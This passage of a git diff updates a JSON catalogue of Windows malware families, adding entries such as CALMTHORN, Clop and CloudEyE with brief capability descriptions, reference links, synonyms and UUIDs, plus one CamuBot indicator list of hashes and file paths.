"https://www.f-secure.com/weblog/archives/00002249.html", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" ], @@ -5460,7 +10678,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/" ], "synonyms": [], "type": [] @@ -5497,7 +10719,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" ], "synonyms": [ "Cadelle" @@ -5507,6 +10730,21 @@ "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", "value": "CadelSpy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn", + "https://www.youtube.com/watch?v=3cUWjojQXWE", + "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://twitter.com/8th_grey_owl/status/1357550261963689985" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52c0b49b-d57e-400d-8808-a00d4171ac05", + "value": "CALMTHORN" + }, { "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { @@ -5552,10 +10790,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html", + "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", - "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", - "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest", + "https://threatintel.blog/OPBlueRaven-Part2/", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html" ], "synonyms": [ "Anunak" @@ -5569,7 +10817,10 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp", + "https://blog.avast.com/2013/04/08/carberp_epitaph/", + "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf", + "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf" ], "synonyms": [], "type": [] @@ -5578,11 +10829,13 @@ "value": "Carberp" }, { - "description": "", + "description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", + "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], @@ -5591,12 +10844,26 @@ "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, + { + "description": "CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball", + "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cca82b51-fef9-4f33-a2f5-418b80d0966d", + "value": "CARROTBALL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", - "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/", + "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" ], "synonyms": [], "type": [] @@ -5636,21 +10903,28 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://risky.biz/whatiswinnti/", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://blog.avast.com/progress-on-ccleaner-investigation", "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", "https://twitter.com/craiu/status/910148928796061696", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" ], - "synonyms": [], + "synonyms": [ + "DIRTCLEANER" + ], "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", @@ -5676,9 +10950,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", - "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" ], "synonyms": [], @@ -5705,6 +10982,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", + "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" ], "synonyms": [], @@ -5713,18 +10991,50 @@ "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, + { + "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone", + "https://securelist.com/project-tajmahal/90240/", + "https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal", + "https://securelist.com/apt-trends-report-q2-2019/91897/" + ], + "synonyms": [ + "Taj Mahal" + ], + "type": [] + }, + "uuid": "e4027aaa-de86-48ea-8567-c215cdb88ec1", + "value": "Chaperone" + }, + { + "description": "CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chch", + "https://twitter.com/GrujaRS/status/1205566219971125249" + ], + "synonyms": [], + "type": [] + }, + "uuid": "22b03600-505c-41d4-ba1c-45d70cc2e123", + "value": "CHCH Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html" ], "synonyms": [ + "HAYMAKER", "Ham Backdoor" ], "type": [] @@ -5732,6 +11042,36 @@ "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", "value": "ChChes" }, + { + "description": "CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c" + ], + "synonyms": [ + "CROWDEDFLOUNDER" + ], + "type": [] + }, + "uuid": "7a6c1063-32b9-4007-8283-ccd4a2163caa", + "value": "CHEESETRAY" + }, + { + "description": "Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker", + "https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e21dc86d-c8a5-44f7-b9d6-5e60373e838b", + "value": "Chernolocker" + }, { "description": "", "meta": { @@ -5768,10 +11108,42 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", - "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://unit42.paloaltonetworks.com/china-chopper-webshell/", + "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", - "https://attack.mitre.org/software/S0020/" + "https://twitter.com/ESETresearch/status/1366862946488451088", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://redcanary.com/blog/microsoft-exchange-attacks", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf", + "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits", + "https://attack.mitre.org/software/S0020/", + "https://blog.joshlemon.com.au/hafnium-exchange-attacks/", + "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/", + "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a", + "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/" ], "synonyms": [], "type": [] @@ -5791,6 +11163,39 @@ "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", "value": "Chinad" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm", + "https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef216f1d-9ee5-4676-ae34-f954a8611290", + "value": "ChinaJm Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy", + "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", + "https://community.riskiq.com/article/56fa1b2f", + "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", + "https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf", + "https://community.riskiq.com/article/5fe2da7f" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f8f5f33b-c719-4b6d-bf98-07979ac0cd97", + "value": "Chinoxy" + }, { "description": "", "meta": { @@ -5809,8 +11214,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "https://www.s21sec.com/en/blog/2017/07/androkins/", - "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" + "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/", + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" ], "synonyms": [ "AndroKINS" @@ -5820,15 +11225,43 @@ "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", "value": "Chthonic" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty", + "http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a1af36b-b8e1-4e05-ac42-c2866ffba031", + "value": "cifty" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi", + "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html", + "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d0f0f754-fe9b-45bd-a9d2-c6110c807af4", + "value": "Cinobi" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", - "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", - "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/" ], "synonyms": [], "type": [] @@ -5836,6 +11269,47 @@ "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", "value": "Citadel" }, + { + "description": "Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling", + "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf", + "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", + "https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "783c8192-d00d-446c-bf06-0ce0cb4bc2c2", + "value": "Clambling" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c433e0f1-760c-41e6-bb62-13eaf7bbf1f4", + "value": "CLASSFON" + }, + { + "description": "CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0417767-5b98-43b0-b9e7-e43dc7f53c6a", + "value": "CLEANTOAD" + }, { "description": "", "meta": { @@ -5849,6 +11323,118 @@ "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", "value": "Client Maximus" }, + { + "description": "The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information.\r\n The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/", + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5d6a9b59-96b1-4bc4-824d-ffe208b99462", + "value": "ClipBanker" + }, + { + "description": "Clop is a ransomware which uses the .clop extension after having encrypted the victim's files. Another unique characteristic belonging with Clop is in the string: \"Dont Worry C|0P\" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", + "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", + "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", + "https://twitter.com/darb0ng/status/1338692764121251840", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8071f2d8-cc44-4682-845b-6f39a9f8b587", + "value": "Clop" + }, + { + "description": "CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", + "https://labs.vipre.com/unloading-the-guloader/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", + 